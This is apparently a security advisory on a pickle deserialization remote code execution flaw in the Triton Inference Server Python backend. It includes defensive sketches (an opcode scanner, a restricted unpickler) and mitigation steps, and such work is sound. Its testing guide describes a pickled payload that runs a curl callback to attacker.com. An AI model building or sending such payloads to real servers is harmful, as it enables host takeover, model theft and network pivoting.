NVIDIA Triton Inference Server Custom Python Backend Deserialization Leads to RCE
Overview
A critical remote code execution vulnerability was identified in the Python backend of NVIDIA's Triton Inference Server. It stems from unsafe deserialization of model inputs when a custom Python model is configured to accept `numpy` arrays with `dtype=object`. An attacker can send a crafted inference request whose input tensor contains a Python object serialized with `pickle`. When the Triton Python backend constructs the numpy array from this input, it implicitly passes the data to a vulnerable deserialization function. This lets the attacker execute arbitrary Python code with the privileges of the `tritonserver` process. A successful exploit grants the attacker full control over the inference server host. From there the attacker can steal or tamper with any model loaded on the server, intercept inference requests and responses, or use the compromised host as a pivot point into the internal network. The vulnerability affects self-hosted Triton deployments and poses a severe risk to MLOps infrastructure.
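NumPy itself treats `dtype=object` as a pickle boundary. It writes object arrays with `pickle`, and since NumPy 1.16.3 `np.load` refuses to load them unless `allow_pickle=True` is passed. The sketch below uses NumPy's own `.npy` format to show this: numeric arrays load safely, while object arrays are rejected by default. It illustrates the general risk only. It does not reproduce Triton's wire format or the vulnerable backend code path, and the helper name `roundtrip` is hypothetical.

```python
import io

import numpy as np


def roundtrip(arr: np.ndarray, allow_pickle: bool) -> np.ndarray:
    """Save `arr` to an in-memory .npy buffer and load it back (hypothetical helper)."""
    buf = io.BytesIO()
    # np.save must be allowed to pickle in order to store object arrays at all.
    np.save(buf, arr, allow_pickle=True)
    buf.seek(0)
    # On load, allow_pickle=False makes NumPy refuse any object array.
    return np.load(buf, allow_pickle=allow_pickle)


numeric = np.arange(4, dtype=np.float32)
objects = np.array([b"payload", {"key": 1}], dtype=object)

# Fixed-size dtypes contain no pickle data and load without allow_pickle.
print(roundtrip(numeric, allow_pickle=False))

try:
    roundtrip(objects, allow_pickle=False)
except ValueError as exc:
    # NumPy refuses to unpickle the object array by default.
    print("rejected:", exc)
```

The same reasoning applies to any code path that turns request bytes into Python objects. If object-dtype data is ever reconstructed with pickle, whoever controls the bytes controls what gets executed.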
Affected Systems
Self-hosted NVIDIA Triton Inference Server deployments running a version earlier than 2.50.0 that serve a custom Python backend model accepting inputs with `dtype=object`.
Testing Guide
1. **Setup:** Deploy a vulnerable version of Triton (earlier than 2.50.0) with a custom Python model that accepts an input with `dtype=object`.
2. **Create Payload:** Write a short Python script that creates a pickled payload which executes a command, e.g., `os.system('curl http://attacker.com/hit')`. Note that `ysoserial` targets Java deserialization and does not generate Python pickle payloads.
3. **Send Request:** Craft an inference request that sends the pickled payload as the input tensor data.
4. **Verify:** Monitor your callback server (`attacker.com`) for an incoming HTTP request from the Triton server, which confirms code execution.
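Before sending test inputs, or when reviewing captured request bodies, it helps to check whether a `BYTES` element is a pickle stream that imports or calls Python objects. This can be done statically, without ever loading the data. The sketch below relies on the standard library's `pickletools.genops`, which walks pickle opcodes without executing them. The function name `pickle_risk_opcodes` and the set of opcodes treated as risky are assumptions modeled on common pickle-scanning heuristics. This is not a Triton feature.

```python
from __future__ import annotations

import datetime
import pickle
import pickletools

# Opcodes that import a global or invoke a callable/constructor while unpickling.
# This set is an assumption based on common pickle-scanning heuristics.
RISKY_OPCODES = frozenset({
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
    "REDUCE", "BUILD", "EXT1", "EXT2", "EXT4",
})


def pickle_risk_opcodes(data: bytes) -> set[str] | None:
    """Return the risky opcodes in `data`, or None if it is not a well-formed pickle.

    The bytes are only parsed by pickletools.genops; nothing is unpickled.
    """
    found: set[str] = set()
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            if opcode.name in RISKY_OPCODES:
                found.add(opcode.name)
    except ValueError:
        # genops raises ValueError for unknown opcodes or a stream without STOP.
        return None
    return found


# A plain list pickles without referencing any global.
benign = pickle.dumps([1, 2, 3])
# A date pickle references datetime.date as a global and calls it via REDUCE.
suspicious = pickle.dumps(datetime.date(2020, 1, 1))

print(pickle_risk_opcodes(benign))
print(pickle_risk_opcodes(suspicious))
print(pickle_risk_opcodes(b"\x00not a pickle"))
```

A static scan like this is a heuristic. It can flag legitimate pickles, and it does not make unpickling untrusted data safe. It is most useful for spotting pickle streams where none are expected.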
Mitigation Steps
1. **Upgrade Triton:** Update to NVIDIA Triton Inference Server version 2.50.0 or later.
2. **Avoid Object DTypes:** Do not use `dtype=object` for inputs in your Python backend model configurations unless absolutely necessary; prefer fixed-size data types such as `TYPE_FP32` or `TYPE_INT32`.
3. **Use Sandboxing:** Run Triton Inference Server in a container with a security profile such as AppArmor or seccomp, or in a sandboxed runtime such as gVisor, to limit the impact of a compromise.
4. **Network Segmentation:** Restrict network access to Triton's inference ports (by default 8000 for HTTP and 8001 for gRPC) so that only trusted application frontends can connect.
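Some models cannot avoid an object-dtype input. For those, one defense-in-depth pattern is to treat each element as opaque bytes and convert the batch to a fixed-width dtype before doing anything else with it. That way, no code path calls `pickle.loads` or `np.load(..., allow_pickle=True)` on request data.

The sketch below assumes the input arrives as a NumPy object array of `bytes`, which is how the Python backend typically presents `TYPE_STRING` inputs. `to_fixed_bytes` and `max_len` are hypothetical names.

```python
import numpy as np


def to_fixed_bytes(arr: np.ndarray, max_len: int = 256) -> np.ndarray:
    """Convert an object-dtype BYTES input into a fixed-width bytes array.

    Every element is treated as opaque bytes: nothing is unpickled or evaluated.
    Note that NumPy's fixed-width "S" dtype drops trailing NUL bytes.
    """
    if arr.dtype != np.dtype(object):
        raise TypeError(f"expected an object array, got {arr.dtype}")
    for item in arr.flat:
        # Reject anything that is not raw bytes (e.g. already-deserialized objects).
        if not isinstance(item, bytes):
            raise TypeError(f"unexpected element type {type(item).__name__}")
        if len(item) > max_len:
            raise ValueError(f"element of {len(item)} bytes exceeds max_len={max_len}")
    return arr.astype(f"S{max_len}")


# An object array of bytes, standing in for a BYTES input tensor.
batch = np.array([b"hello", b"world"], dtype=object)
fixed = to_fixed_bytes(batch, max_len=16)
print(fixed.dtype, fixed.tolist())
```

Bounding the element length also caps memory use per request. Rejecting non-`bytes` elements catches any upstream layer that has already turned the input into Python objects.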
Patch Details
The vulnerability is patched in Triton Inference Server 2.50.0. The fix adds a configuration flag that disables object deserialization and makes safer parsing the default behavior.
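The patch pairs an opt-in flag with a safer default, and the same design can be sketched in application code. Object inputs are treated as opaque bytes unless a flag is set. Even when the flag is set, unpickling goes through an allowlist, following the "Restricting Globals" pattern from the Python `pickle` documentation.

The flag name `allow_object_deserialization`, the class `RestrictedUnpickler`, and the empty allowlist are hypothetical. They do not reflect Triton's actual configuration option, whose name this advisory does not give.

```python
import datetime
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves globals on an explicit allowlist (hypothetical)."""

    # (module, name) pairs that may be imported; empty means no globals at all.
    ALLOWED_GLOBALS: frozenset = frozenset()

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def decode_object_input(data: bytes, allow_object_deserialization: bool = False):
    """Safe by default: return raw bytes unless deserialization is explicitly enabled."""
    if not allow_object_deserialization:
        return data
    # Even when enabled, only plain containers and allowlisted globals can be rebuilt.
    return RestrictedUnpickler(io.BytesIO(data)).load()


raw = pickle.dumps(datetime.date(2020, 1, 1))
print(decode_object_input(raw) == raw)  # default: bytes pass through untouched
print(decode_object_input(pickle.dumps([1, 2, 3]), allow_object_deserialization=True))
try:
    decode_object_input(raw, allow_object_deserialization=True)
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

An allowlist narrows the risk of unpickling untrusted data but does not remove it, since a crafted stream can still consume excessive memory or CPU. Leaving the flag off remains the safer default.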